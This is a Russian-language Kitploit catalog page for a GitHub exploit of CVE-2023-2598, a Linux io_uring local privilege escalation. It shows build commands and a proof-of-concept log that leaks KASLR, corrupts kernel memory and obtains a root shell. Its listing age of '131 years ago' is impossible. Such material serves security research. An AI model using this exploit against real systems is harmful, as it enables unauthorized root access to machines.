Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/llfam/cve-2023-2598
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubllfam/cve-2023-2598

CVE-2023-2598

Эксплойт на C для CVE-2023-2598, уязвимости повышения привилегий в ядре Linux в io_uring. Достигает root shell через повреждение памяти на основе сокетов и обход KASLR.

Репозиторий
131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-2598

Refer:

  • https://anatomic.rip/cve-2023-2598/
  • https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598
  • https://bsauce.github.io/2024/07/30/CVE-2023-2598/

Сборка:

root@kitploit:~
apt install -y liburing-dev
gcc CVE-2023-2598.c -o CVE-2023-2598 -luring

PoC:

root@kitploit:~
user1@syzkaller:~$ uname -a
Linux syzkaller 6.3.1 #6 SMP PREEMPT_DYNAMIC Wed Nov  6 16:50:02 CST 2024 x86_64 GNU/Linux
user1@syzkaller:~$ id
uid=1000(user1) gid=1000(eop-test) groups=1000(eop-test) context=system_u:system_r:kernel_t:s0
user1@syzkaller:~$ ./CVE-2023-2598
[+] Эксплойт CVE-2023-2598 от LL
[+] Старое rlimit_cur = 1024
[+] Новое rlimit_cur = 1048576
[+] limit: 349518, nr_sockets: 174759, nr_memfds: 174759
[+] memfd: 0, страница: 0 по адресу virt_addr: 0x4247000000, чтение 2048000 байт
[+] Найден egg 0xdeadbeefdeadbeef в receiver_buffer+0x1491c8
[+] Найден sock в receiver_buffer+0x149000
[+] Найден kaslr_leak: 0xffffffff81add890
[+] Найден kaslr_base: 0xffffffff81000000
[+] Найден сокет fd: 1936
[+] Найден адрес sock в ядре: 0xffff88813b000000
[+] Адрес поддельного proto в ядре: 0xffff88813b000578
[+] Установлен адрес args в ядре: 0xffff88813b000730
[+] Установлен адрес argv в ядре: 0xffff88813b000760
[+] Установлен subprocess_info в sock+0 по адресу 0xffff88813b000000
[+] Вызов ioctl()...
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
# whoami
root
# exit
[+] Восстановлен tcp_sock
[+] Готово
Скачать инструмент